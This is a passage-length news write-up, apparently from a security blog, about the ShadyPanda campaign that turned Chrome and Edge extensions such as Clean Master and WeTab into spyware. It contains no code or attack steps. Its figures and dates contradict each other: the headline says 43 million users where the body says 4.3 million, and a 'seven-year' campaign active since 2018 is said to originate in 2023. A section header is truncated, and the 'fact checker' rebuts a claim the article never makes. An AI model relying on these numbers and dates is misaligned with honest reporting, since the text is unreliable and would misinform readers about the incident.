Seven-Year Browser Extension Campaign Exposed: 43 Million Users Compromised

Introduction

A massive, long-running browser extension operation has come to light, revealing how cybercriminals exploited trust and legitimacy to quietly compromise millions of users. The group behind this campaign, known as ShadyPanda, leveraged popular Chrome and Edge extensions to collect sensitive browsing data, install spyware, and evade detection for years. This case underscores the growing risks associated with browser extensions and the urgent need for vigilance in managing digital tools.

ShadyPanda’s Stealth Campaign

A new report by Koi Security exposes a seven-year-long malware operation that affected over 4.3 million users of Chrome and Edge. ShadyPanda operated through trusted browser marketplaces, initially offering seemingly harmless extensions, only to later push malicious updates. Five extensions, including the widely used Clean Master, contained a remote code execution backdoor impacting around 300,000 users.

These extensions, operational since 2018, appeared legitimate until mid-2024, when updates enabled hourly downloads of arbitrary JavaScript. This malware tracked website visits, exfiltrated encrypted browsing histories, and captured complete browser fingerprints.

Simultaneously, another spyware operation targeted Microsoft Edge users, reaching over 4 million through five extensions, most notably WeTab, which alone had 3 million installs. This malware collected every URL visited, search term, mouse click, and browser identifier, sending the data to servers in China.

ShadyPanda’s origins trace back to 2023, beginning with 145 browser extensions disguised as wallpapers or productivity tools. These add-ons injected affiliate codes on shopping websites and utilized Google Analytics to track user behavior. Researchers identified three key tactics that contributed to ShadyPanda’s persistence: limited post-approval monitoring, high trust in extensions with strong install counts, and the advantages of long-term legitimacy.

By early 2024, ShadyPanda escalated its attacks. One extension, Infinity V+, redirected searches through a known hijacker, harvested cookies, and transmitted keystrokes to external servers. While many malicious extensions were eventually removed, the group continually refined its strategies. Koi Security highlights that static analysis at the time of submission, coupled with minimal ongoing monitoring, allowed these campaigns to succeed. Clean Master, for example, remained legitimate for five years before turning malicious.

Users are now advised to audit their browser extensions regularly, remove unnecessary tools, and prioritize developers with clear, transparent update histories to mitigate such risks.

What Undercode Say: Strategic Insights into

ShadyPanda’s campaign illustrates a sophisticated exploitation of digital trust. Unlike typical malware attacks that rely on immediate exploitation or phishing, ShadyPanda leveraged legitimacy, patience, and marketplace trust, turning browser extensions into long-term spyware delivery mechanisms.

The methodology of the group shows how attackers adapt to detection frameworks. Initially, the group focused on affiliate code injections, which are largely benign and even profitable. This allowed ShadyPanda to build credibility and a high install count without raising suspicion. Over time, as user trust solidified, they shifted to remote code execution capabilities, enabling arbitrary JavaScript downloads and real-time data exfiltration.

The focus on both Chrome and Edge demonstrates a multi-platform strategy. By diversifying targets, ShadyPanda maximized impact and reduced reliance on a single marketplace’s security measures. The staggering volume of compromised users—over 4 million—is a testament to the effectiveness of this approach.

Koi Security’s report also exposes fundamental weaknesses in the extension review system. Static analysis at submission is insufficient, as it cannot detect delayed malicious updates. ShadyPanda exploited this gap by maintaining legitimate functionality for years, only triggering harmful behavior later. This indicates that the entire browser extension ecosystem requires dynamic, continuous monitoring and behavioral analysis.

Moreover, the data collection practices—logging URLs, search terms, clicks, cookies, and keystrokes—suggest a dual purpose: commercial profiling and potentially state-level surveillance. Routing traffic to servers in China adds geopolitical complexity, raising questions about how cybercrime networks intersect with international data flows.

For users, the lessons are clear. Regular audits of installed extensions, careful evaluation of update histories, and skepticism toward seemingly trusted tools are essential. Developers with transparency and frequent code reviews reduce risk, but systemic changes in marketplace monitoring are critical. Without reform, attackers will continue to exploit trust and legitimacy as long-term strategies.

ShadyPanda’s campaign also signals a shift in the threat landscape. Cybercriminals increasingly adopt patient, multi-year approaches that capitalize on human and systemic trust. Quick fixes, like removing one malicious extension, may not be sufficient if marketplaces cannot enforce ongoing scrutiny. Users and organizations must treat browser extensions as active security considerations, not passive utilities.

Fact Checker Results

✅ ShadyPanda operated over seven years, affecting more than 4.3 million users.
✅ Malicious updates began in mid-2024 for previously legitimate extensions.
❌ The claim that only Chrome was affected is false; Microsoft Edge extensions were also targeted.

Prediction

📊 Browser extension attacks will likely increase in sophistication. Expect future campaigns to leverage long-term legitimacy and automated JavaScript payloads. Users who fail to audit their extensions may face data breaches, and marketplaces will need to adopt continuous monitoring systems to counter these threats.